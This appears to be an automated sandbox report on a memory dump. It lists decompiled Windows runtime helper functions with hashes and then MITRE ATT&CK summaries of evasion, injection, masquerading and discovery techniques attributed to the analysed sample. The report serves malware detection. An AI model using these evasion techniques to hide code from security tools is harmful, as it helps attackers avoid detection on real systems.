Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: ba69692d6adbd51ac42bed68d2f535f8b1b591ed08bf623be6f39953dbc4298d
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 3FE0D832A40218BBCB21DAD99E05F5AFBACDB44A60F040255F904DF150D9609D10D2D0

Uniqueness

Uniqueness Score: -1.00%

Function 0362FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0362FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x35f11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E036E88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E03630050(_t14);
				}
			}

0x0362ff66
0x0362ff6b
0x00000000
0x0362ff8f
0x00000000
0x0362ff8f

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e9a6b7e86609233aea5dd5463c0fa2379a806ad4c23599819bc47e732c215b
Instruction ID: aa246461636f7fee9340d60bfeb24e21f89dedda9a40c0a11d0ad2adbd55e1b7
Opcode Fuzzy Hash: 72e9a6b7e86609233aea5dd5463c0fa2379a806ad4c23599819bc47e732c215b
Instruction Fuzzy Hash: C4E0DFB4209B54DFD734DF51D260F257FBCAB52621F1FC09EE8084F201CA21D881CA0A

Uniqueness

Uniqueness Score: -1.00%

Function 036CD380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036CD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0361E8B0(__ecx, _a4, 0xfff);
					L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x036cd38a
0x036cd39b
0x036cd3b1
0x00000000
0x036cd3b6
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: aa4f84065a914d1fd92e046d88f6ffe291e6f5ceb22c29954189b5fa26a89322
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: F5E0C235280748BBDB229E44CC00F79BB6ADB417A0F144039FE085E790CA71DCA2D6C8

Uniqueness

Uniqueness Score: -1.00%

Function 036A41E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E036A41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x36f08f0);
				_t5 = E0366D08C(__ebx, __edi, __esi);
				if( *0x37087ec == 0) {
					E0362EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x37087ec == 0) {
						 *0x37087f0 = 0x37087ec;
						 *0x37087ec = 0x37087ec;
						 *0x37087e8 = 0x37087e4;
						 *0x37087e4 = 0x37087e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L036A4248();
				}
				return E0366D0D1(_t5);
			}

0x036a41e8
0x036a41ea
0x036a41ef
0x036a41fb
0x036a4206
0x036a420b
0x036a4216
0x036a421d
0x036a4222
0x036a422c
0x036a4231
0x036a4231
0x036a4236
0x036a423d
0x036a423d
0x036a4247

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f29aacb2143837995b2b6f670e9f46736188c054711b25ccedf13b8c32d4b2c6
Instruction ID: 2ecf364710ac6124ed0fdb0158d8d083d993a3a2b5a8f59d04c29240d4b9ed75
Opcode Fuzzy Hash: f29aacb2143837995b2b6f670e9f46736188c054711b25ccedf13b8c32d4b2c6
Instruction Fuzzy Hash: 67F01578910B24EEDBA2EFE9990070836A8F74835DF00A16F81108B38DCB784880CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 0364A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0364A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x37067e4 >= 0xa) {
					if(_t5 < 0x3706800 || _t5 >= 0x3706900) {
						return L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E03630010(0x37067e0, _t5);
				}
			}

0x0364a190
0x0364a1a6
0x0364a1c2
0x00000000
0x00000000
0x00000000
0x0364a192
0x0364a192
0x0364a19f
0x0364a19f

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09285b665d0c324c5e34a87f8456f4153bcd7ec624bebc458d14789f2b3de35b
Instruction ID: 7bd0b9ca77e10c15e53b4e307816eaa78468e6f92d741291d6175e933a179bc3
Opcode Fuzzy Hash: 09285b665d0c324c5e34a87f8456f4153bcd7ec624bebc458d14789f2b3de35b
Instruction Fuzzy Hash: 6BD02B659A0004EAF71CF344C974B2226D6E784704F30441CE1034F9D0DF6088F4D10C

Uniqueness

Uniqueness Score: -1.00%

Function 036416E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036416E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E03641710(0x37067e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L03634620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x036416e8
0x036416ef
0x036416f3
0x036416fe
0x00000000
0x03641700
0x0364170d
0x0364170d
0x036416f2
0x036416f2
0x036416f2
0x036416f2

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2f34cf0a44d61b514946a4041f2a5d95936fd3f7f98a364e5bd11ea3ff0513
Instruction ID: 4c0decd726c297b0fbe4dda3c9ff3590b641dc564efe79bd0f70af506ae8e2ac
Opcode Fuzzy Hash: bf2f34cf0a44d61b514946a4041f2a5d95936fd3f7f98a364e5bd11ea3ff0513
Instruction Fuzzy Hash: CED0A931240200A2EB2EDB159A28B146292EB82B85F3C006CF21B4DAC0CFB0CCF2E44C

Uniqueness

Uniqueness Score: -1.00%

Function 036953CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036953CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0362EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x036953ca
0x036953ce
0x036953d9
0x036953de
0x036953e1
0x036953e1
0x036953e6
0x036953f3
0x00000000
0x036953f8
0x036953fb

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 4809846bba1cb04e1bc719f01f78a46a5b6829ff59348139580731586757edb3
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: BAE08C769007849BDF13DB48C750F5EBBF9FB49B00F190018A4095F720C624AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0362AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0362AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0362aab6
0x0362aabb
0x0367a442
0x00000000
0x0367a448
0x0367a454
0x0367a454
0x0362aac1
0x0362aac1
0x0362aac6
0x0362aac6

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: eb78f75ff894edcd97f522ec283e55b1491e86fafe8b531ee9c8261fdb1384bf
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 06D0C935352D80CFD616CB5CC654B0573A8BB04B40FCA04D0E400CB761E66CD944CA00

Uniqueness

Uniqueness Score: -1.00%

Function 036435A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036435A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0362EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x036435a1
0x036435a1
0x036435a5
0x036435ab
0x036435ab
0x036435b5
0x00000000
0x036435c1
0x036435b7

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 5b4d12c02754f4ea57e764396845740ff23445fc3b98c491f58cbfc1243c89ce
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 5ED0A73DC0118099DB0BFB10C3147687771BB00204F7C106990010D755C336492AC604

Uniqueness

Uniqueness Score: -1.00%

Function 0361DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0361DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L03634620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0361db4d
0x0361db54
0x0361db5f
0x0361db56
0x0361db56
0x0361db5c
0x0361db5c

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 28a6fc9a4dc76ec4716515c7f24543acdc5c5eebefb70b81512785d03ea6385b
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: ADC08C702C0B00AAEB229F20CE01B11B6A0BB02B01F4800A06301DA0F0DF78D822E600

Uniqueness

Uniqueness Score: -1.00%

Function 0369A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0369A537(intOrPtr _a4, intOrPtr _a8) {

				return L03638E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0369a553

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: f4178e09496e2a99d44bed4ba2cc3709a42c3a455e9ca6c7e6a1899a1dcfae5b
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: E1C08C37080248BBCB12AF82CC00F467F2AFB94B60F008014FA080F570C632E970EB88

Uniqueness

Uniqueness Score: -1.00%

Function 03633A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03633A1C(intOrPtr _a4) {
				void* _t5;

				return L03634620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x03633a35

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 353c9007bede83dc104655f7071bb7b7798f3a9adfdb770bc9a99648f8e1a514
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: C9C08C32080648BBC712AE42DC00F01BB29E791B60F000020B6040A5608932EC60D58C

Uniqueness

Uniqueness Score: -1.00%

Function 036276E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036276E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x036276e4
0x00000000
0x036276f8
0x036276fd

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 278510885d629352d639dbd41b91e5077a02fd0c42b1f12f346d303af4aa9dfe
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 75C08CB4141A845AEB2AD709CF24F203AA4AB08608F4D019CAE020D6A2C368A822CA08

Uniqueness

Uniqueness Score: -1.00%

Function 036436CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036436CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L03634620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x036436d2
0x036436e8
0x036436d4
0x036436e5
0x036436e5

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 0e1bb2e5e2b7cdcc032a259caa5abcdd4b9433530d609d80d1fd90913de57607
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: CEC09B79195940BBE7169F30CE51F15B254F741A61F7C07587221496F0DD699C20D504

Uniqueness

Uniqueness Score: -1.00%

Function 0361AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0361AD30(intOrPtr _a4) {

				return L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0361ad49

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 768a8d3c1051d5231e3e10b48efb09c59332916d78fb8066d2a92ab8d81fda44
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: A1C08C32080248BBC712AA45CD00F017B69E790B60F000020F6040A6618932E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 03637D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03637D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x03637d56
0x03637d5b
0x03637d60
0x03637d5d
0x03637d5d
0x03637d5d

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 58e17cddc3dbf7f37561b421a6842f4ca78bd94e693bd7a2cb881f5cb685a4af
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 9AB092343019408FCE16DF18C180B2533E8FB45A40B8800D0E400CBA20D329E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 03642ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03642ACB() {
				void* _t5;

				return E0362EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x03642adc

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 780db5b147ab27645aa45bca2bdf810c39d981e42d12ed2dee7972285edb7171
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: E1B01233C11950CFCF02EF40C710B197731FB00750F0644A4A0012F930C229AC01CF40

Uniqueness

Uniqueness Score: -1.00%

Function 036AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E036AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0365CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E036A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E036A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x036afdda
0x036afde2
0x036afde5
0x036afdec
0x036afdfa
0x036afdff
0x036afe0a
0x036afe0f
0x036afe17
0x036afe1e
0x036afe19
0x036afe19
0x036afe19
0x036afe20
0x036afe21
0x036afe22
0x036afe25
0x036afe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036AFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036AFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036AFE2B

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 5bad3a506a299920e93741ed4f4d7b9cfa07c517e30c8e5651e099c6e27d3a97
Instruction ID: 8580ef8378b063733be769f5db66983970990a31817c84150002525dec92634b
Opcode Fuzzy Hash: 5bad3a506a299920e93741ed4f4d7b9cfa07c517e30c8e5651e099c6e27d3a97
Instruction Fuzzy Hash: CDF0F676240601BFDA249A49DC06F37BF6AEB45730F240359F6685A1D1EA62FC208AF5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

